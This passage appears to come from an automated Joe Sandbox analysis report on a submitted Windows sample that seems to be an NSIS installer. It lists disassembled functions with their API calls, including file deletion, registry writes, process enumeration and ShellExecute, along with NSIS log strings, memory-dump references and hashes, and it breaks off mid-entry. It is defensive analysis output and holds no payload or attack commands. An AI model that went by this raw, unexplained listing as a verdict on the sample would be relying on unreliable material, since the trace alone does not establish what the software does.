                                                                                                          • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                          • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                          Strings
                                                                                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                          • \*.*, xrefs: 00406D03
                                                                                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                          • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                          • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                          • API String ID: 2035342205-3294556389
                                                                                                          • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                          • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                                          • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                          • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                                          Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                          • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                          • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                                          • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                                          • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                          • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                          • API String ID: 3581403547-784952888
                                                                                                          • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                          • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                                          • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                          • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                                          Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                                          Strings
                                                                                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateInstance
                                                                                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                          • API String ID: 542301482-1377821865
                                                                                                          • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                          • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                                          • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                          • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                                          Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFindFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 1974802433-0
                                                                                                          • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                          • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                                                          • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                          • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                                                          Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                                          • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                                          • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                                            • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                                          • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                          • API String ID: 20674999-2124804629
                                                                                                          • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                          • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                                          • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                          • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                                          Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                                          • GetSysColor.USER32(?), ref: 004041AF
                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                                          • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                                            • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                                          • SendMessageW.USER32(00000000), ref: 00404251
                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                                          • SetCursor.USER32(00000000), ref: 004042D2
                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                                          • SetCursor.USER32(00000000), ref: 004042F6
                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                          • String ID: @%F$N$open
                                                                                                          • API String ID: 3928313111-3849437375
                                                                                                          • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                          • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                                          • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                          • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                                          Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                                          • wsprintfA.USER32 ref: 00406B4D
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                          • String ID: F$%s=%s$NUL$[Rename]
                                                                                                          • API String ID: 565278875-1653569448
                                                                                                          • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                                          • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                                          • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                                          • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                          • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                          • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                          • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                          • EndPaint.USER32(?,?), ref: 00401177
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                          • String ID: F
                                                                                                          • API String ID: 941294808-1304234792
                                                                                                          • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                          • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                                          • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                          • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                                          Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                          • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          Strings
                                                                                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                          • API String ID: 1641139501-220328614
                                                                                                          • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                          • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                                          • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                          • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                                          Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                          Strings
                                                                                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                          • String ID: created uninstaller: %d, "%s"
                                                                                                          • API String ID: 3294113728-3145124454
                                                                                                          • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                          • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                                          • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                          • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                                          Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
